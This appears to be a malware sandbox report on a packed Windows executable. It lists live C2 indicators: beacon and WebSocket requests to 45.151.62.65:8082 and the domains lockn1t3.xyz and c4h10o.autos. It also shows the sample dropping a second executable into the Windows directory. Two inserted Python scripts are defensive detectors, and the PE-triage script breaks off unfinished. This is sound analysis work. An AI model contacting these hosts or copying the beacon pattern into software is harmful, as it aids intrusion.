Windows Analysis Report
gjsdk.exe

Overview

General Information

Sample name: gjsdk.exe
Analysis ID: 1529334
MD5: 0537541bc5c5e92570375c1178f6b8c0
SHA1: 041c02dbab31e9521f865f7e1783314364a93ec2
SHA256: f38d1ee353a3c7f45a20a67b46bed65c4312fc24d7dcb761d800c8003d8d10e5

Detection

Score: 52
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Drops executables to the windows directory (C:\Windows) and starts them
Uses known network protocols on non-standard ports
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Drops PE files to the windows directory (C:\Windows)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection

Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: gjsdk.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49953
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 45.151.62.65:8082
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Connection: Upgrade | Sec-WebSocket-Key: Mkj9i1IGcuFLi6pPiAlmsQ== | Sec-WebSocket-Version: 13 | Upgrade: websocket
Source: global traffic HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Connection: Upgrade | Sec-WebSocket-Key: GF7zLiydRprawdcGTIIheg== | Sec-WebSocket-Version: 13 | Upgrade: websocket
Source: global traffic HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Connection: Upgrade | Sec-WebSocket-Key: OUx2ht0WNPJoXjDZ6u3e2w== | Sec-WebSocket-Version: 13 | Upgrade: websocket
Source: global traffic HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Connection: Upgrade | Sec-WebSocket-Key: iEPpNfUCMB4KPKjaL5VSPQ== | Sec-WebSocket-Version: 13 | Upgrade: websocket
Source: global traffic HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Connection: Upgrade | Sec-WebSocket-Key: +Z+9VSkuyjpvQkVrx8MhxQ== | Sec-WebSocket-Version: 13 | Upgrade: websocket
Source: global traffic HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Connection: Upgrade | Sec-WebSocket-Key: C0P5MvCyAeBMUwbVkkAe/w== | Sec-WebSocket-Version: 13 | Upgrade: websocket
Source: global traffic HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Connection: Upgrade | Sec-WebSocket-Key: myJxkJJ4oaSedrcwhxGnjA== | Sec-WebSocket-Version: 13 | Upgrade: websocket
Source: global traffic HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Connection: Upgrade | Sec-WebSocket-Key: fiJuZ0206DDY4XC9dWnhuA== | Sec-WebSocket-Version: 13 | Upgrade: websocket
Source: global traffic HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Connection: Upgrade | Sec-WebSocket-Key: 7eYFrZDFqk4ipCw7Av6AyA== | Sec-WebSocket-Version: 13 | Upgrade: websocket
Source: global traffic HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Connection: Upgrade | Sec-WebSocket-Key: FH2w5nqUvChS0FqylUd82g== | Sec-WebSocket-Version: 13 | Upgrade: websocket
Source: global traffic HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | Host: 45.151.62.65:8082 | User-Agent: Go-http-client/1.1 | Connection: Upgrade | Sec-WebSocket-Key: V0fRj4PL+mkXO4y7UJYUpw== | Sec-WebSocket-Version: 13 | Upgrade: websocket
Source: global traffic DNS traffic detected: DNS query: c4h10o.autos
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000080000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: ftp://192.168.2.47
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000008000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://%s:%d/%sHTTP/1.1
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000394000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://%s:%d/%sbg-hi-bluebg-hi-magentabg-hi-cyanHTTP/1.1
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000300000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2963616316.000000C0008C6000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000300000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2963616316.000000C0008C6000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.jpg
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000080000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://45.151.62.65:8082/7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfky
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000300000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2963616316.000000C0008C6000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://html4/loose.dtd
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000124000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002DC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/go-sql-driver/mysql/wiki/old_passwords
Source: gjsdk.exe, 00000000.00000002.1748840323.000000C00060A000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C000394000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000222000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0000F2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signature
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000110000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureNAME:
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C0000F2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureeyJhbGc
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000394000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.mdMust
Source: gjsdk.exe, 00000000.00000002.1748840323.000000C00060A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.mdThe
Source: mmzwi.exe, 00000002.00000002.2963616316.000000C0008AE000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C000162000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://lockn1t3.xyz
Source: mmzwi.exe, 00000002.00000002.2962140246.000000C0005D2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://lockn1t3.xyz--09AZ__azMMZWIODFMQ2GGOJRGRTGIM3GMY4TOYRVHBQTQZRSMZRDQNLEMVSWOZLDNNXQ
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000162000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://lockn1t3.xyz00:11:22:33:44:5500:11:22:33:44:5500:11:22:33:44:5500:11:22:33:44:5500:11:22:33:
Source: gjsdk.exe, 00000000.00000002.1748840323.000000C0005D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://lockn1t3.xyzMMZWIODFMQ2GGOJRGRTGIM3GMY4TOYRVHBQTQZRSMZRDQNLEMVSWOZLDNNXQMMZWIODFMQ2GGOJRGRTG
Source: mmzwi.exe, 00000002.00000002.2963616316.000000C000904000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://lockn1t3.xyzocelot.jython27.xyztiger.jython27.xyz00:11:22:33:44:55cecreate
Source: gjsdk.exe, 00000000.00000002.1748840323.000000C0005D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://lockn1t3.xyzsizeof(rtype)
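The HTTP entries above show the C2 pattern in full: a Go default User-Agent, a bare IP literal as Host on port 8082, a repeated GET for one opaque 88-character base64url path (the length of 64 base64url-encoded bytes), and a WebSocket upgrade handshake on "/". The script below is an added example, not Joe Sandbox code, that parses raw HTTP/1.1 request heads and scores them against exactly those indicators; the sample requests are constructed from the report's entries rather than taken from the sandbox pcap, and the allow list of "normal" HTTP ports is an assumption to tune per environment. It also derives the Sec-WebSocket-Accept value (RFC 6455) a compliant server must answer with, so an analyst can confirm in the capture that the upgrade really completed.

```python
"""Detection logic for the HTTP/WebSocket beaconing pattern in the report.

Added example, not Joe Sandbox code. Sample requests are constructed from the
report's entries (not the sandbox pcap); STANDARD_HTTP_PORTS is an assumption.
"""
import base64
import binascii
import hashlib
import ipaddress
import re
from dataclasses import dataclass

# RFC 6455 section 4.2.2: Sec-WebSocket-Accept = base64(SHA1(key + GUID))
_WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
# Assumption: ports on which plain HTTP/WebSocket is expected in this environment
STANDARD_HTTP_PORTS = {80, 443, 8080, 8443}
# One path segment made only of base64url characters, long enough to be a key or
# token rather than a resource name (the report's path is 88 chars = 64 bytes)
_OPAQUE_PATH = re.compile(r"^/[A-Za-z0-9_-]{40,}={0,2}$")


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict  # header names lower-cased

    def host_and_port(self) -> tuple:
        """Split the Host header into (name, port); port 80 when none is given."""
        host = self.headers.get("host", "")
        name, sep, port = host.rpartition(":")
        if sep and port.isdigit():
            return name, int(port)
        return host, 80


def parse_request(raw: bytes) -> HttpRequest:
    """Parse the head of a raw HTTP/1.1 request (CRLF separated, as on the wire)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers)


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def valid_ws_key(key: str) -> bool:
    """Sec-WebSocket-Key must decode to exactly 16 bytes (RFC 6455 section 4.1)."""
    try:
        return len(base64.b64decode(key, validate=True)) == 16
    except (binascii.Error, ValueError):
        return False


def ws_accept_for(key: str) -> str:
    """Sec-WebSocket-Accept a compliant server must return for this key; compare it
    with the 101 response in the pcap to confirm the channel really upgraded."""
    digest = hashlib.sha1((key + _WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def score_request(req: HttpRequest) -> list:
    """Return the names of the indicators this request matches."""
    hits = []
    host, port = req.host_and_port()
    if req.headers.get("user-agent", "").startswith("Go-http-client/"):
        hits.append("go-default-user-agent")  # Go net/http default UA
    if is_ip_literal(host):
        hits.append("ip-literal-host")  # no DNS name, direct connect as in the report
    if port not in STANDARD_HTTP_PORTS:
        hits.append(f"non-standard-port:{port}")
    if (req.headers.get("upgrade", "").lower() == "websocket"
            and "upgrade" in req.headers.get("connection", "").lower()):
        hits.append("websocket-upgrade")
        if not valid_ws_key(req.headers.get("sec-websocket-key", "")):
            hits.append("malformed-websocket-key")
    if _OPAQUE_PATH.match(req.path):
        hits.append("opaque-base64url-path")
    return hits


# Constructed sample requests modelled on the report's entries.
SAMPLE_BEACON = (
    b"GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1\r\n"
    b"Host: 45.151.62.65:8082\r\n"
    b"User-Agent: Go-http-client/1.1\r\n"
    b"Accept-Encoding: gzip\r\n\r\n"
)
SAMPLE_WS_UPGRADE = (
    b"GET / HTTP/1.1\r\n"
    b"Host: 45.151.62.65:8082\r\n"
    b"User-Agent: Go-http-client/1.1\r\n"
    b"Connection: Upgrade\r\n"
    b"Sec-WebSocket-Key: Mkj9i1IGcuFLi6pPiAlmsQ==\r\n"
    b"Sec-WebSocket-Version: 13\r\n"
    b"Upgrade: websocket\r\n\r\n"
)
SAMPLE_BENIGN = b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"

if __name__ == "__main__":
    for raw in (SAMPLE_BEACON, SAMPLE_WS_UPGRADE, SAMPLE_BENIGN):
        req = parse_request(raw)
        print(req.method, req.path[:24], score_request(req))
```

Scoring is additive on purpose: any one indicator (Go UA, IP-literal Host, port 8082) is weak alone, but the beacon request trips four and the upgrade request trips four, while an ordinary browser request trips none.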
Source: C:\Users\user\Desktop\gjsdk.exe File created: C:\Windows\AppReadiness\.840809828.tmp Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe File created: C:\Windows\AppReadiness\.209553492.tmp Jump to behavior
Source: classification engine Classification label: mal52.troj.evad.winEXE@4/0@1/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Users\user\Desktop\gjsdk.exe File opened: C:\Windows\system32\ Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe File opened: C:\Windows\system32\ Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002AC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002AC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002AC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002AC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: C:\Users\user\Desktop\gjsdk.exe File read: C:\Users\user\Desktop\gjsdk.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\gjsdk.exe "C:\Users\user\Desktop\gjsdk.exe"
Source: C:\Users\user\Desktop\gjsdk.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\AppReadiness\mmzwi.exe C:\Windows\AppReadiness\mmzwi.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\Desktop\gjsdk.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanagersvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: gjsdk.exe Static file information: File size 12120576 > 1048576
Source: gjsdk.exe Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0xb8ee00
Source: gjsdk.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: gjsdk.exe Static PE information: section name: UPX2
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
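The static findings above (UPX0/UPX1/UPX2 section names, a UPX1 raw size of 0xb8ee00 against the 0x100000 threshold, a 12 MB file, and the HIGH_ENTROPY_VA / DYNAMIC_BASE / NX_COMPAT / TERMINAL_SERVER_AWARE DllCharacteristics) are all readable from the PE headers without executing the sample. The following is an added example, not Joe Sandbox's engine, that walks the DOS header, PE signature, COFF header, optional header and section table and reproduces those checks. It parses a constructed header-only PE32+ image built to match the report's facts, not the real gjsdk.exe; the allow list of standard section names is an assumption to extend per toolchain.

```python
"""Static PE triage reproducing the report's static-information checks.

Added example, not Joe Sandbox code. build_sample_pe() constructs a header-only
PE32+ image with the report's section layout and DllCharacteristics; it is not
the real sample. STANDARD_SECTION_NAMES is an assumption.
"""
import struct
from dataclasses import dataclass

# Assumption: section names emitted by common Windows toolchains
STANDARD_SECTION_NAMES = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                          ".pdata", ".rsrc", ".reloc", ".tls", ".debug", ".CRT"}
# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
ONE_MIB = 0x100000
SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


@dataclass
class Section:
    name: str
    virtual_size: int
    virtual_address: int
    raw_size: int
    raw_pointer: int
    characteristics: int


@dataclass
class PeInfo:
    machine: int
    magic: int
    dll_characteristics: int
    sections: list
    file_size: int


def parse_pe(data: bytes) -> PeInfo:
    """DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    (dll_chars,) = struct.unpack_from("<H", data, opt + 70)  # same offset in PE32 and PE32+
    first_section = opt + opt_size
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, rsize, rptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HDR, data, first_section + 40 * i)
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                vsize, vaddr, rsize, rptr, chars))
    return PeInfo(machine, magic, dll_chars, sections, len(data))


def dll_characteristics_names(value: int) -> list:
    return [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if value & bit]


def triage(pe: PeInfo) -> list:
    """Findings phrased like the report's static signatures."""
    findings = []
    for s in pe.sections:
        if s.name not in STANDARD_SECTION_NAMES:
            findings.append(f"non-standard section name: {s.name}")
        if s.raw_size > ONE_MIB:
            findings.append(f"raw size of {s.name} is bigger than {ONE_MIB:#x}: {s.raw_size:#x}")
        if s.raw_size == 0 and s.virtual_size and s.characteristics & IMAGE_SCN_MEM_EXECUTE:
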